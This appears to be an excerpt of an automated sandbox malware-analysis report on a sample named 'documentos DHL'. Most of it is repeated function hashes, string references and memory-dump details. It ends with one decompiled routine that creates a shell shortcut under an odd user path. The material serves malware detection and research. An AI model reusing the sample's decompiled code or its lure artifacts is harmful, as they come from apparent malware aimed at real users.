Opcode Fuzzy Hash: 016bb693e2a700f685e6bb0c7548950f8ad91c2be5c0791a9b03a8ddcd570941
Instruction Fuzzy Hash: E931AE4EE1B70A95D376A034C5E23F22389DF062B1F64871A4C6752DD5BF0E058966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D3A Relevance: 3.9, Strings: 3, Instructions: 177COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 2f5948ec8092a4a68306c8c0b3868aee024bce53b00a2b4174ed5c2545933c01
Instruction ID: 8f6504b35fafe20c0b6339df2b18f77b89493ec35aa9189048410099d4b6446f
Opcode Fuzzy Hash: 2f5948ec8092a4a68306c8c0b3868aee024bce53b00a2b4174ed5c2545933c01
Instruction Fuzzy Hash: 3F41E14AE2B30A94D377A034C1D27F22788DF072F1F548B198867A2DD5BF0E098926C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372DC5 Relevance: 3.9, Strings: 3, Instructions: 175COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: f088ac918077422ad031ce27d3d911be27840d4a0ceeed8722e0a720b2bfbf0e
Instruction ID: b10af77e92ab15752bf3e0e9464a57e52574fda4c0c232fff92e0f885c0bae59
Opcode Fuzzy Hash: f088ac918077422ad031ce27d3d911be27840d4a0ceeed8722e0a720b2bfbf0e
Instruction Fuzzy Hash: FE41EF0AE1B70A94D3B7A034C1D27F22389DF062E1F648B194C67A2DD4BF1E094966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D73 Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 30d4d1bf5622c21d9b1fd1915cd5126513e0615bcd191efedb2bc86c043ca02c
Instruction ID: 1f0d78b7efa282dd62cc9c5b57d85a839f78185fadb4df6dc91f8ce371b07cd0
Opcode Fuzzy Hash: 30d4d1bf5622c21d9b1fd1915cd5126513e0615bcd191efedb2bc86c043ca02c
Instruction Fuzzy Hash: 5841AE4AE2B30A94D3B7E034C1E27F3278DDF062E1F548B1A8867A2D95BF1E054967C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D5F Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: a0b9d02600e8b2661a9b146caaf74d68ccfaec5f3a8ea7e13cfc8493955edacb
Instruction ID: d65a25d79840958b80fa47a7a7c5c18730b2ae6f8b8109413649404172cc2203
Opcode Fuzzy Hash: a0b9d02600e8b2661a9b146caaf74d68ccfaec5f3a8ea7e13cfc8493955edacb
Instruction Fuzzy Hash: 5341BE4AE2B70A94D377E034C5E27F3278DCF062E1F548B1A8867A2D95BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D75 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: e9cef3b501a037112425b2d6a3ab525deb152c0a473444f8f2aabf063826ef2b
Instruction ID: e6e35907242f6dd66a6ee31d49c27473391fd19a451f393a37a9eb727183062f
Opcode Fuzzy Hash: e9cef3b501a037112425b2d6a3ab525deb152c0a473444f8f2aabf063826ef2b
Instruction Fuzzy Hash: 3D41BE4AE2F70A94D377E034C1E27F3278DCF062E1F648B1A8867A2D95BF1E054966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D63 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 685f0f38a4cbe61498fc8e0244ac63c134ff9299e2c7bb29a17ccaa1dd73e205
Instruction ID: 529fe43fcf3cf9cfe7b99956f5b3f6e03dd49229a033344cf7e81ff3a0c1fe4b
Opcode Fuzzy Hash: 685f0f38a4cbe61498fc8e0244ac63c134ff9299e2c7bb29a17ccaa1dd73e205
Instruction Fuzzy Hash: 8141B24AE2B30994E3B7E034C5D27F2138DDF062E1F548B1A8867A2DD57F1E058926C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D61 Relevance: 3.9, Strings: 3, Instructions: 173COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 340a8a6a71a4f83215a594675473f7100b6a7d9d053fe3a8b131125d20b2eea5
Instruction ID: b088ff24ca4145e7c739dfa918e90c797a02bcd072b01336912b8e52e49c860a
Opcode Fuzzy Hash: 340a8a6a71a4f83215a594675473f7100b6a7d9d053fe3a8b131125d20b2eea5
Instruction Fuzzy Hash: 3C41BE4AE2B70A94D377E034C5E2BF3278DCF062E1F548B1A8867A2D95BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D51 Relevance: 3.9, Strings: 3, Instructions: 172COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 53c14895a7a52631a93dcbd20f33cbed8930ff884a45a036febd08da8669fa35
Instruction ID: aa8696081573e0261c807c7f1b608ff060d4a7f19911b54b7aacbf9234f9e90c
Opcode Fuzzy Hash: 53c14895a7a52631a93dcbd20f33cbed8930ff884a45a036febd08da8669fa35
Instruction Fuzzy Hash: B441C34AE2B30994E3B7E034C5D27F2138DDF062E1F548B1A8867A2DD57F1E058926C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372E41 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 4d93cfd1bf9e0261aa3ea5d986c318c583f69e24bb130920467248d37544b173
Instruction ID: 60ee3f2832e63f46b8a47980996e681014f22e49b3d841300ca550b450986ef7
Opcode Fuzzy Hash: 4d93cfd1bf9e0261aa3ea5d986c318c583f69e24bb130920467248d37544b173
Instruction Fuzzy Hash: B141C04EF1B70A95E376A034C5D23F62389DF062F1F648B194C67A2DE4BF0E094966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D65 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 8dc7f106afffeb8f1107d08f1e1c1b81c41a7c11f05cd73ddd3a551edb33208a
Instruction ID: c3be9aac040f0a98e1f0636d2191b092ad64af13bb21ca2086a57e5597160bbc
Opcode Fuzzy Hash: 8dc7f106afffeb8f1107d08f1e1c1b81c41a7c11f05cd73ddd3a551edb33208a
Instruction Fuzzy Hash: ED41B04AE2B70A94D377E034C1D27F3278DDF062E1F648B1A8867A2DD5BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D69 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 33524cbf01b0fb6135d23de8dbcbd3f6280007a045f6ce1f3f1b285cac79c297
Instruction ID: f7e625e1d50257b247080d1e14057e98a74a26738ee9f0b4ba64fcb78338c045
Opcode Fuzzy Hash: 33524cbf01b0fb6135d23de8dbcbd3f6280007a045f6ce1f3f1b285cac79c297
Instruction Fuzzy Hash: 8941C14AE2B30A94E3B7E034C5D27F3238DDF062E1F648B1A8867A2DD57F1E054966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D55 Relevance: 3.9, Strings: 3, Instructions: 171COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 363878c43a50981ae674c40c22c4a917520f6a26b718cd1c6775a54feef591d9
Instruction ID: 735be7ea8d85de8570f8a0c3b52e4298c3297a4cec1fae5180be30e60b564925
Opcode Fuzzy Hash: 363878c43a50981ae674c40c22c4a917520f6a26b718cd1c6775a54feef591d9
Instruction Fuzzy Hash: 6741C14AE2B30A94E377E034C5D27F2238DDF062E1F648B1A8867A2DD57F1E058966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D67 Relevance: 3.9, Strings: 3, Instructions: 170COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 463912efc2fbc9bb42f445e2aa3b0771f8d7d527049ff43ea4f1484a2d6db76a
Instruction ID: cdcb25e96eb8e9b3caf20e5ea73e89739d4fd3a108a5ef042f32d91bc57adbe5
Opcode Fuzzy Hash: 463912efc2fbc9bb42f445e2aa3b0771f8d7d527049ff43ea4f1484a2d6db76a
Instruction Fuzzy Hash: 9E41AF4AE2B30A94D377E034C1D27F22789DF062E1F648B1A8867A2D95BF1E054966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372D6B Relevance: 3.9, Strings: 3, Instructions: 170COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c604979215f6e5106342d04592743f2cbd87adaa66008b4d087e2c3b8aa00b95
Instruction ID: f8c330edbd77c06df131e7be085871c5ac43d2eae5877d077ddd351fbda62346
Opcode Fuzzy Hash: c604979215f6e5106342d04592743f2cbd87adaa66008b4d087e2c3b8aa00b95
Instruction Fuzzy Hash: CC41B04AE2B30994E3B7E034C5D27F2238DDF062E1F648B1A8867A2DD57F1E058966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D6D Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 1015b11a756e4284f0678538309463667b239c23a2795eb43fcaaf3520d8141d
Instruction ID: acc68a58bca0f1a8ec7cebe8bc008fde0c3be1bf1f8bf0d86c03f2cca8afb7f4
Opcode Fuzzy Hash: 1015b11a756e4284f0678538309463667b239c23a2795eb43fcaaf3520d8141d
Instruction Fuzzy Hash: FA41C14AE2B30994D377E034C1D27F3238DDF062E1F548B1A8867A2DD57F1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D53 Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 06d4a42ee25e4423a3ccecf4c087a09763baa67f03cecec7e94f9cade5b6dcbd
Instruction ID: 770dca4063dae7f450008b0649252548110cefed969f04e72a447c4744fa42c0
Opcode Fuzzy Hash: 06d4a42ee25e4423a3ccecf4c087a09763baa67f03cecec7e94f9cade5b6dcbd
Instruction Fuzzy Hash: 3D41B04AE2B30995D3B7E034C1D27F2278DDF062E1F548B1A8867A2DD5BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D59 Relevance: 3.9, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: bce50f91c7ef93ba4b7a75d0450ce1e2db5d3a718e14c30c4567d7c3f14c821b
Instruction ID: 434c7a65406fd17a0c737d6dedadeb05d4ea1c6520725ea62eaa89d69eca3c9c
Opcode Fuzzy Hash: bce50f91c7ef93ba4b7a75d0450ce1e2db5d3a718e14c30c4567d7c3f14c821b
Instruction Fuzzy Hash: 1241C04AE2B30A94D3B7E034C1D27F3238DDF062E1F648B1A8867A2DD5BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D6F Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 2152a6eb4deaa023a6f31668a23a5fc8f3ef1b5dfe0c854fe789852b46e1e6fe
Instruction ID: 780bd03bb2e7e432edcc62932908c77fc426a82c3167518a28f443f505bcd1f5
Opcode Fuzzy Hash: 2152a6eb4deaa023a6f31668a23a5fc8f3ef1b5dfe0c854fe789852b46e1e6fe
Instruction Fuzzy Hash: A441B04AE2B70A94D3B7E034C1D27F3238DDF062E1F648B1A8867A2DD5BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372D5B Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: b5063854bc9eb2d3b454d132d80a5635a5ff1b992cbf6ce1d82f45cd78cca5c3
Instruction ID: 817bae63a06f71800bdc992cb4298ff334e6b3e65ccca9a6aab452b51fe48d19
Opcode Fuzzy Hash: b5063854bc9eb2d3b454d132d80a5635a5ff1b992cbf6ce1d82f45cd78cca5c3
Instruction Fuzzy Hash: FB41C14AE2B30A94E377E034C1D27F2238DDF062E1F548B1A8867A2DD57F1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372F7C Relevance: 3.9, Strings: 3, Instructions: 166COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c592cd2d4af315da37e619a5a6db792ecab0f7d5e90863f9df463f851934765b
Instruction ID: 7af34c532902ee65ff5b965a30f817d83be918d981a130a53f97d223020030cf
Opcode Fuzzy Hash: c592cd2d4af315da37e619a5a6db792ecab0f7d5e90863f9df463f851934765b
Instruction Fuzzy Hash: 0231AE4AF2F30A95D366E03485E23E22389DF072B1F58871A4C63529D5FF1E494966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372DB2 Relevance: 3.9, Strings: 3, Instructions: 165COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: cc67fb1180a8aaa1fc5a6306ac59ae9a4eb6726fa18aa83ee6f59dfb85076239
Instruction ID: e0f112d32298e22cec3ee05fbdef62083595a476a16370a32a832bc78a160c96
Opcode Fuzzy Hash: cc67fb1180a8aaa1fc5a6306ac59ae9a4eb6726fa18aa83ee6f59dfb85076239
Instruction Fuzzy Hash: 4F41B34EE2B70A94D377A034C1D27F2278DDF062E1F648B1A4C67A2DD5BF1E054966C4

Uniqueness

Uniqueness Score: -1.00%

Function 03372FDA Relevance: 3.9, Strings: 3, Instructions: 164COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: c11de1d072aa9f35ca4c206f7f506931b245e8cbbbb92c76c2ea9e836529fabd
Instruction ID: 65861ab92b360f8aa0c9681ed087a870e9c8e2e7abdef562c589becaea10ca21
Opcode Fuzzy Hash: c11de1d072aa9f35ca4c206f7f506931b245e8cbbbb92c76c2ea9e836529fabd
Instruction Fuzzy Hash: EF31B04AF2B70AA5D377A03485E23F22389DF032B1FA8871A4DA352DD5FF1E054966C5

Uniqueness

Uniqueness Score: -1.00%

Function 03372DAC Relevance: 3.9, Strings: 3, Instructions: 162COMMON

Download Yara Rule

Strings

+, xrefs: 033736AF
@, xrefs: 03373694
{, xrefs: 033736BD

Memory Dump Source

Source File: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3370000_documentos DHL.jbxd

Yara matches

Similarity

API ID:
String ID: +$@${
API String ID: 0-393719628
Opcode ID: 06b4a99c426b8e5067158ad0ce6007c8eed407a8b466b74858413707c89415dd
Instruction ID: 55cd905dbdb6e69e13ed068ad8151dc0db4e7123604b11eb50b60c4ca1e7390b
Opcode Fuzzy Hash: 06b4a99c426b8e5067158ad0ce6007c8eed407a8b466b74858413707c89415dd
Instruction Fuzzy Hash: 0F41BF4AE2B70A94D3B7E034C2D27F2238DDF062E1F648B194C67A2DD4BF0E058966C4

Uniqueness

Uniqueness Score: -1.00%

Function 004020FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004020FE() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x4c)) = E00402C37(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x3c)) = E00402C37(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C37(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C37(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C37(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x38) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405CF8( *((intOrPtr*)(_t107 - 0x3c))) == 0) {
					E00402C37(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084dc, _t83, 1, 0x4084cc, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084ec, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x3c)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes\\Tset\\Demodulationen\\Iagttagerposition");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x38));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x4c)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x00402107
0x00402111
0x0040211b
0x00402125
0x00402130
0x00402133
0x0040214d
0x00402150
0x00402156
0x00402159
0x00402163
0x00402167
0x00402167
0x0040216c
0x0040217d
0x00402185
0x0040223c
0x0040223c
0x00402243
0x0040218b
0x0040218b
0x0040219a
0x0040219e
0x004021a1
0x004021a7
0x004021b5
0x004021b8
0x004021ba
0x004021c5
0x004021c5
0x004021ca
0x004021cc
0x004021d3
0x004021d3
0x004021d6
0x004021df
0x004021e2
0x004021e8
0x004021ea
0x004021f4
0x004021f4
0x004021f7
0x00402200
0x00402203
0x0040220c
0x00402212
0x00402214
0x00402222
0x00402222
0x00402225
0x0040222b
0x0040222b
0x0040222e
0x00402234
0x0040223a
0x0040224f
0x00000000
0x00000000
0x00000000
0x0040223a
0x00402245
0x00402ac2
0x00402ace

APIs

CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040217D

Strings

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition, xrefs: 004021BD

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition
API String ID: 542301482-3479193329
Opcode ID: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
Instruction ID: fcf7de762e0310186ccf97c85ab7d5ba58e988de4da68cff16f28a22b081737a
Opcode Fuzzy Hash: d21109b947604d2aeedf4ad2c9da0992de00d0e594a19d7853b024dfbf8c0e49
Instruction Fuzzy Hash: EE414A75A00208AFCB10DFE4C988AAEBBB5FF48314F20457AF515EB2D1DB799941CB44

Uniqueness

Uniqueness Score: -1.00%

